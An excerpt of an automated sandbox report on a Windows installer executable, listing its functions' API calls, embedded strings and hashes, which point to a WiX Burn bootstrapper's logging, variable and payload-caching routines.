                                                                                                                                                                    • String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
                                                                                                                                                                    • API String ID: 3057421322-109962352
                                                                                                                                                                    • Opcode ID: c87b955c1287e322fafb31101045f5796aca6f184ccfa9f374d38311bd58978a
                                                                                                                                                                    • Instruction ID: 30f75ded307bbffe25d98b868a83804a8cd6be3a93c7a917be2760ddb62e39cf
                                                                                                                                                                    • Opcode Fuzzy Hash: c87b955c1287e322fafb31101045f5796aca6f184ccfa9f374d38311bd58978a
                                                                                                                                                                    • Instruction Fuzzy Hash: 8041E376E412399FDB21AF658C09BEA7BA8EB48710F004199ED48B61C0E774CE90CB90
                                                                                                                                                                    Function 009048EF Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130memorysynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,00905466,?,?,?,?), ref: 00904920
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00905466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00904931
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00904A6E
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00905466,?,?,?,?,?,?,?,?,?,?,?), ref: 00904A77
                                                                                                                                                                    Strings
                                                                                                                                                                    • comres.dll, xrefs: 009049DD
                                                                                                                                                                    • Failed to connect to unelevated process., xrefs: 00904916
                                                                                                                                                                    • Failed to allocate thread local storage for logging., xrefs: 0090495F
                                                                                                                                                                    • Failed to set elevated pipe into thread local storage for logging., xrefs: 009049A8
                                                                                                                                                                    • Failed to create the message window., xrefs: 009049CC
                                                                                                                                                                    • engine.cpp, xrefs: 00904955, 0090499E
                                                                                                                                                                    • Failed to pump messages from parent process., xrefs: 00904A42
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocCloseErrorHandleLastMutexRelease
                                                                                                                                                                    • String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
                                                                                                                                                                    • API String ID: 687263955-1790235126
                                                                                                                                                                    • Opcode ID: 565d0e2fba314596372ddff88b702569e443d6789b557116cd9ef851b869ec70
                                                                                                                                                                    • Instruction ID: d39d1acafb67d35eedf1b835dc227d3143f3b5d0afe8576632c8b23e1714731a
                                                                                                                                                                    • Opcode Fuzzy Hash: 565d0e2fba314596372ddff88b702569e443d6789b557116cd9ef851b869ec70
                                                                                                                                                                    • Instruction Fuzzy Hash: 7D4183B3A40629BFC7129BA4CC45FEFBA6CBF85754F010226BB15A6180DB70E95097E4
                                                                                                                                                                    Function 00913B4E Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 130COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 00913BA2
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 00913BAC
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 00913C15
                                                                                                                                                                    • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 00913C1C
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 00913CA6
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get length of temp folder., xrefs: 00913C06
                                                                                                                                                                    • %u\, xrefs: 00913C36
                                                                                                                                                                    • Failed to get length of session id string., xrefs: 00913C71
                                                                                                                                                                    • Failed to copy temp folder., xrefs: 00913CCF
                                                                                                                                                                    • crypt32.dll, xrefs: 00913B61
                                                                                                                                                                    • Failed to get temp folder., xrefs: 00913BDA
                                                                                                                                                                    • logging.cpp, xrefs: 00913BD0
                                                                                                                                                                    • Failed to format session id as a string., xrefs: 00913C4A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
                                                                                                                                                                    • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
                                                                                                                                                                    • API String ID: 2407829081-3274134579
                                                                                                                                                                    • Opcode ID: becd535c1e9948608cb303e09f5a3e33354797882d2ced955755f963e9270909
                                                                                                                                                                    • Instruction ID: 4cae6d496d4498337d7e660d5d5972c65520e56cd56761aa4aa77a6e6037a39b
                                                                                                                                                                    • Opcode Fuzzy Hash: becd535c1e9948608cb303e09f5a3e33354797882d2ced955755f963e9270909
                                                                                                                                                                    • Instruction Fuzzy Hash: F441B372E8523DABDB219B609C49FD9B77CAB54750F108191FD18B7280EB709F848BD0
                                                                                                                                                                    Function 00907FA5 Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 216COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 00907FC2
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 009081EA
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get version., xrefs: 0090819B
                                                                                                                                                                    • Failed to write variable value as number., xrefs: 00908194
                                                                                                                                                                    • Failed to get string., xrefs: 009081B5
                                                                                                                                                                    • Failed to write included flag., xrefs: 009081D8
                                                                                                                                                                    • feclient.dll, xrefs: 0090809D, 009080F3, 00908134
                                                                                                                                                                    • Failed to get numeric., xrefs: 009081BC
                                                                                                                                                                    • Failed to write variable count., xrefs: 00907FDD
                                                                                                                                                                    • Failed to write variable value as string., xrefs: 009081AE
                                                                                                                                                                    • Unsupported variable type., xrefs: 009081A7
                                                                                                                                                                    • Failed to write variable name., xrefs: 009081D1
                                                                                                                                                                    • Failed to write literal flag., xrefs: 009081C3
                                                                                                                                                                    • Failed to write variable value type., xrefs: 009081CA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
                                                                                                                                                                    • API String ID: 3168844106-2118673349
                                                                                                                                                                    • Opcode ID: 72979f92e4486618c302800494787e757194ab5e321a2eb0f8e32078a6a3d714
                                                                                                                                                                    • Instruction ID: 1dbf42e6fdaf865311c65a46393614f4a57e90487bd7bf8fbece0628a93f35a3
                                                                                                                                                                    • Opcode Fuzzy Hash: 72979f92e4486618c302800494787e757194ab5e321a2eb0f8e32078a6a3d714
                                                                                                                                                                    • Instruction Fuzzy Hash: 7E71B272E0962AEFCB529EA4CC41FAFBBB8BF44354F104561F94167290CB34DD169B90
                                                                                                                                                                    Function 009197B2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 123fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,0091A843,00000000,00000000,00000000,?,00000000), ref: 009197CD
                                                                                                                                                                    • GetLastError.KERNEL32(?,0091A843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 009197DD
                                                                                                                                                                      • Part of subcall function 00944102: Sleep.KERNEL32(?,00000000,?,009185EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00904DBC), ref: 00944119
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 009198E9
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to verify payload hash: %ls, xrefs: 00919875
                                                                                                                                                                    • Failed to move %ls to %ls, xrefs: 009198C1
                                                                                                                                                                    • Copying, xrefs: 00919888, 00919893
                                                                                                                                                                    • %ls payload from working path '%ls' to path '%ls', xrefs: 00919894
                                                                                                                                                                    • cache.cpp, xrefs: 00919801
                                                                                                                                                                    • Failed to verify payload signature: %ls, xrefs: 00919838
                                                                                                                                                                    • Moving, xrefs: 0091987F
                                                                                                                                                                    • Failed to open payload in working path: %ls, xrefs: 0091980C
                                                                                                                                                                    • Failed to copy %ls to %ls, xrefs: 009198D7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                                                    • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
                                                                                                                                                                    • API String ID: 1275171361-1604654059
                                                                                                                                                                    • Opcode ID: af5012d2c6b848107312b934aeab7ae82c01fad2d0ff72b5392c46146d9a674e
                                                                                                                                                                    • Instruction ID: 49701112ec70adbad048d393ab932e2a3f55060cf4c1070fa2150b6b43bbda59
                                                                                                                                                                    • Opcode Fuzzy Hash: af5012d2c6b848107312b934aeab7ae82c01fad2d0ff72b5392c46146d9a674e
                                                                                                                                                                    • Instruction Fuzzy Hash: 8B313872F412387BDB326A569C6AFAB6A1CDF82F61F0101A4FE147B281D270DD4097E1
                                                                                                                                                                    Function 009065C0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 009065FC
                                                                                                                                                                      • Part of subcall function 00940ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00905EB2,00000000), ref: 00940AE0
                                                                                                                                                                      • Part of subcall function 00940ACC: GetProcAddress.KERNEL32(00000000), ref: 00940AE7
                                                                                                                                                                      • Part of subcall function 00940ACC: GetLastError.KERNEL32(?,?,?,00905EB2,00000000), ref: 00940AFE
                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00906628
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00906636
                                                                                                                                                                    • GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 0090666E
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00906678
                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 009066BB
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009066C5
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get 64-bit system folder., xrefs: 00906664
                                                                                                                                                                    • Failed to get 32-bit system folder., xrefs: 009066A6
                                                                                                                                                                    • variable.cpp, xrefs: 0090665A, 0090669C
                                                                                                                                                                    • Failed to set system folder variant value., xrefs: 00906724
                                                                                                                                                                    • Failed to backslash terminate system folder., xrefs: 00906708
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
                                                                                                                                                                    • String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 325818893-1590374846
                                                                                                                                                                    • Opcode ID: 760b0bd39d099e71d9d1140efdb19792cd89e716942864a47912d703e2b4bd09
                                                                                                                                                                    • Instruction ID: 4d189aad82110a28839755b6b52d0b641e016fefc4668f5bd3415298716473c7
                                                                                                                                                                    • Opcode Fuzzy Hash: 760b0bd39d099e71d9d1140efdb19792cd89e716942864a47912d703e2b4bd09
                                                                                                                                                                    • Instruction Fuzzy Hash: 13311176D46239ABDB3097618C4DFAA77ACAF00750F014565BE04BB2C0EB75DD408AE1
                                                                                                                                                                    Function 00913F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00913AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00913FB5,feclient.dll,?,00000000,?,?,?,00904B12), ref: 00913B42
                                                                                                                                                                    • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00904B12,?,?,0094B488,?,00000001,00000000,00000000), ref: 0091404C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseSleep
                                                                                                                                                                    • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                                                                    • API String ID: 2834455192-2673269691
                                                                                                                                                                    • Opcode ID: 9a0ea8f6594c2a9eba785718ce22b6384a373f66a7a9d5ec4d129e100ee3b1a8
                                                                                                                                                                    • Instruction ID: bc48a53b31d72545f988c24066ba4d9146cb6064685b40275f64fd55f58f27f7
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a0ea8f6594c2a9eba785718ce22b6384a373f66a7a9d5ec4d129e100ee3b1a8
                                                                                                                                                                    • Instruction Fuzzy Hash: C261CF71B04219BEDB229F25CC46FAA77ACEF68390B148565FD01DB280E770EDD08B91
                                                                                                                                                                    Function 00906DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000001,?,00000000,00905445,00000006,?,009082B9,?,?,?,00000000,00000000,00000001), ref: 00906DC8
                                                                                                                                                                      • Part of subcall function 009056A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00906595,00906595,?,0090563D,?,?,00000000), ref: 009056E5
                                                                                                                                                                      • Part of subcall function 009056A9: GetLastError.KERNEL32(?,0090563D,?,?,00000000,?,?,00906595,?,00907F02,?,?,?,?,?), ref: 00905714
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,009082B9), ref: 00906F59
                                                                                                                                                                    Strings
                                                                                                                                                                    • Attempt to set built-in variable value: %ls, xrefs: 00906E56
                                                                                                                                                                    • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00906F6B
                                                                                                                                                                    • variable.cpp, xrefs: 00906E4B
                                                                                                                                                                    • Failed to set value of variable: %ls, xrefs: 00906F41
                                                                                                                                                                    • Setting string variable '%ls' to value '%ls', xrefs: 00906EED
                                                                                                                                                                    • Failed to find variable value '%ls'., xrefs: 00906DE3
                                                                                                                                                                    • Setting hidden variable '%ls', xrefs: 00906E86
                                                                                                                                                                    • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00906ED0
                                                                                                                                                                    • Failed to insert variable '%ls'., xrefs: 00906E0D
                                                                                                                                                                    • Unsetting variable '%ls', xrefs: 00906F15
                                                                                                                                                                    • Setting numeric variable '%ls' to value %lld, xrefs: 00906EFA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                    • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                                    • API String ID: 2716280545-445000439
                                                                                                                                                                    • Opcode ID: e189e92c3f73dcb626f37f053f186028c150d700c907c33dec89fa1f66a1a84b
                                                                                                                                                                    • Instruction ID: f723235161c1b8ba92f878ba651ed5ef7b4d1d9679b7f1c3afa47169258b5137
                                                                                                                                                                    • Opcode Fuzzy Hash: e189e92c3f73dcb626f37f053f186028c150d700c907c33dec89fa1f66a1a84b
                                                                                                                                                                    • Instruction Fuzzy Hash: 7551E471A41226AFDB309F29DC8AF6B3BACEB95714F110519F9485A2C2C375DC70CAE1
                                                                                                                                                                    Function 00912C1C Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 299COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00912C8A
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to add registration action for dependent related bundle., xrefs: 00912F8E
                                                                                                                                                                    • Failed to check for remaining dependents during planning., xrefs: 00912E30
                                                                                                                                                                    • crypt32.dll, xrefs: 00912CD5, 00912DCF, 00912EC4, 00912F39
                                                                                                                                                                    • Failed to add dependent bundle provider key to ignore dependents., xrefs: 00912DF4
                                                                                                                                                                    • wininet.dll, xrefs: 00912ED7
                                                                                                                                                                    • Failed to add registration action for self dependent., xrefs: 00912F57
                                                                                                                                                                    • Failed to add dependents ignored from command-line., xrefs: 00912D3F
                                                                                                                                                                    • Failed to create the string dictionary., xrefs: 00912CC3
                                                                                                                                                                    • Failed to add self-dependent to ignore dependents., xrefs: 00912D0E
                                                                                                                                                                    • Failed to allocate registration action., xrefs: 00912CF3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
                                                                                                                                                                    • API String ID: 1825529933-1705955799
                                                                                                                                                                    • Opcode ID: 45bd0fd6aee791453212cf7b57fb56eb79dfe1f0c9356c774bac375bcd298eb8
                                                                                                                                                                    • Instruction ID: 4f867ce87661fad45c3f1f322dc74237ce65f6d8b884ffdb9ce04bbea3ee1f4a
                                                                                                                                                                    • Opcode Fuzzy Hash: 45bd0fd6aee791453212cf7b57fb56eb79dfe1f0c9356c774bac375bcd298eb8
                                                                                                                                                                    • Instruction Fuzzy Hash: BCB16A70B0021AEBDF29EF64D841BEABBB9FF44710F008169F815AA251D734D9A1CBD1
                                                                                                                                                                    Function 0091F90B Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 187COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0091F947
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 0091FA2A
                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000027), ref: 0091FA4B
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 0091FAF4
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to convert bundle update guid into string., xrefs: 0091FA6A
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091FA60
                                                                                                                                                                    • Failed to set update bundle., xrefs: 0091FACE
                                                                                                                                                                    • Failed to default local update source, xrefs: 0091F9B7
                                                                                                                                                                    • Failed to create bundle update guid., xrefs: 0091FA37
                                                                                                                                                                    • update\%ls, xrefs: 0091F9A3
                                                                                                                                                                    • Failed to recreate command-line for update bundle., xrefs: 0091FA12
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$CreateEnterFromLeaveStringUuid
                                                                                                                                                                    • String ID: EngineForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
                                                                                                                                                                    • API String ID: 171215650-2594647487
                                                                                                                                                                    • Opcode ID: bf57e7e2e82e89291af6046dc69e8916c946a2e7d23ee11194c6be70c507054f
                                                                                                                                                                    • Instruction ID: 9128b267f19fbe23aa33190d89dca0a951a76dd95d126e7657ab5a37e5a7f3ac
                                                                                                                                                                    • Opcode Fuzzy Hash: bf57e7e2e82e89291af6046dc69e8916c946a2e7d23ee11194c6be70c507054f
                                                                                                                                                                    • Instruction Fuzzy Hash: B0618831A4421DABDF21DFA5C855FEEBBB8EF48710F154179F808AB252E7759880CB90
                                                                                                                                                                    Function 00904AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsWindow.USER32(?), ref: 00904C64
                                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00904C75
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to check global conditions, xrefs: 00904B49
                                                                                                                                                                    • WixBundleLayoutDirectory, xrefs: 00904BF5
                                                                                                                                                                    • Failed to set layout directory variable to value provided from command-line., xrefs: 00904C06
                                                                                                                                                                    • Failed to create the message window., xrefs: 00904B98
                                                                                                                                                                    • Failed while running , xrefs: 00904C2A
                                                                                                                                                                    • Failed to set registration variables., xrefs: 00904BDE
                                                                                                                                                                    • Failed to query registration., xrefs: 00904BAE
                                                                                                                                                                    • Failed to set action variables., xrefs: 00904BC4
                                                                                                                                                                    • Failed to open log., xrefs: 00904B18
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
